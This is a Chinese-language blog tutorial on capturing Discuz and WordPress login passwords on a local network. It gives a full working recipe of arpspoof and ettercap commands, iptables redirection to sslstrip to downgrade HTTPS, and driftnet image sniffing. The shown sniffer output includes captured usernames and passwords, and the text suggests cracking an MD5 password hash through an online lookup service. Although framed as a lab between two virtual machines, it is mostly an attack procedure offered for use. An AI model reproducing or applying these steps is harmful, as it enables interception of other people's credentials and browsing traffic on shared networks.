如何通过局域网欺诈获取discuz、wordpress账户密码
无论是wordpress、还是discuz这些cms系统
无论是https、还是http都可以获取到账户密码
但是浏览器不能使用隐身模式,不然获取不到(这也是为什么机智的我上网每次都开无痕模式)
相关环境
攻击机:kali linux
ip地址:192.168.47.128
靶机:Debian10
ip地址:192.168.47.129
kali linux开启转发
使用下面命令
echo 1 > /proc/sys/net/ipv4/ip_forward
查看记录
┌──(root 663962)-[/home/q663962]
└─# cat /proc/sys/net/ipv4/ip_forward
1
arpspoof的安装
安装arpspoof
sudo apt-get install dsniff
执行效果
正在读取软件包列表... 完成
正在分析软件包的依赖关系树
正在读取状态信息... 完成
下列软件包是自动安装的并且现在不需要了:
libplymouth4 libxml-dom-perl libxml-perl libxml-regexp-perl
使用'sudo apt autoremove'来卸载它(它们)。
将会同时安装下列软件:
libnids1.21
下列【新】软件包将被安装:
dsniff libnids1.21
升级了 0 个软件包,新安装了 2 个软件包,要卸载 0 个软件包,有 1119 个软件包未被升级。
需要下载 131 kB 的归档。
解压缩后会消耗 497 kB 的额外空间。
您希望继续执行吗? [Y/n] y
arpspoof的使用
使用arpspoof
命令
实验需要使用两个窗口
第一个窗口
监听ip地址为192.168.47.129
网关为192.168.47.2
的数据
sudo arpspoof -t 192.168.47.129 192.168.47.2 -i eth0
第二个窗口
ettercap -Tq -i eth0
HTTP浏览器无痕模式
然后在靶机浏览网页输入账户和密码
输入完成之后,在攻击机器查看
针对discuzX3.4系统http下,使用无痕浏览,只能抓取到用户名,密码、cookies均抓取不到。
HTTP浏览器正常模式
这里尝试使用浏览器正常模式访问
discuz访问测试
可以探测到密码
效果如下
HTTP : 101.200.203.230:80 -> USER: FancyPig PASS: e807f1fcf82d132f9bb018ca6738a19f INFO: http://www.ddgbr.com/
CONTENT: formhash=2c3e04a6&referer=http%3A%2F%2Fwww.ddgbr.com%2F&username=FancyPig&password=e807f1fcf82d132f9bb018ca6738a19f&questionid=0&answer=
然后使用md5解码,有很多这样类似的在线解码网址
本站针对md5、sha1等全球通用公开的加密算法进行反向查询,通过穷举字符组合的方式,创建了明文密文对应查询数据库,创建的记录约90万亿条,占用硬盘超过500TB,查询成功率95%以上,很多复杂密文只有本站才可查询。自2006年已稳定运行十余年,国内外享有盛誉。
wordpress访问测试
可以探测到wordpress的密码
DHCP: [00:0C:29:91:86:C3] REQUEST 192.168.47.128
DHCP: [192.168.47.254] ACK : 192.168.47.128 255.255.255.0 GW 192.168.47.2 DNS 192.168.47.2 "localdomain"
HTTP : 39.106.66.45:80 -> USER: admin PASS: youcanreallydance INFO: http://wp.iculture.cc/wp-login.php?redirect_to=http://wp.iculture.cc/wp-admin/&reauth=1
CONTENT: log=admin&pwd=youcanreallydance&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=http%3A%2F%2Fwp.iculture.cc%2Fwp-admin%2F&testcookie=1
这里wordpress的密码甚至直接就显示出来了
HTTPS浏览器正常模式
推荐阅读:Kali安装sslstrip以及踩坑分享
Kali安装sslstrip以及踩坑分享 这里需要安装sslstrip3,相关详情点击阅读
相关命令
清除类型为nat
的iptables
echo 1 > /proc/sys/net/ipv4/ip_forward iptalbes -t nat -F
端口转发,10000为sslstrip的监听端口
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
查看iptables列表是否生效
sslstrip -l 10000
iptables -t nat -L
监听ip地址为192.168.47.129
网关为192.168.47.2
的数据
sudo arpspoof -t 192.168.47.129 192.168.47.2 -i eth0
另一个窗口里
ettercap -Tq -i eth0
某些浏览器里是可以的,我测试的firefox貌似检测不到,当然也有可能是因为目前很多网站开启了HSTS的原因,这个时候需要配合到其他的工具才可以。
配合driftnet
配合driftnet
模块可以嗅探到流量中的图片
安装driftnet
apt-get install driftnet
使用图片嗅探功能
driftnet -i eth0
还可以监测到别人访问页面时候浏览的图片
靶机访问页面
攻击机这边显示
单击一下即可保存
点一下可以保存至桌面
常见问题
网上很多说是如果使用的是NAT模式,出现以下报错,要用桥接模式,其实是错的。
真正原因是没有输入sudo
arpspoof: libnet_open_link(): UID/EUID 0 or capability CAP_NET_RAW required
暂无评论内容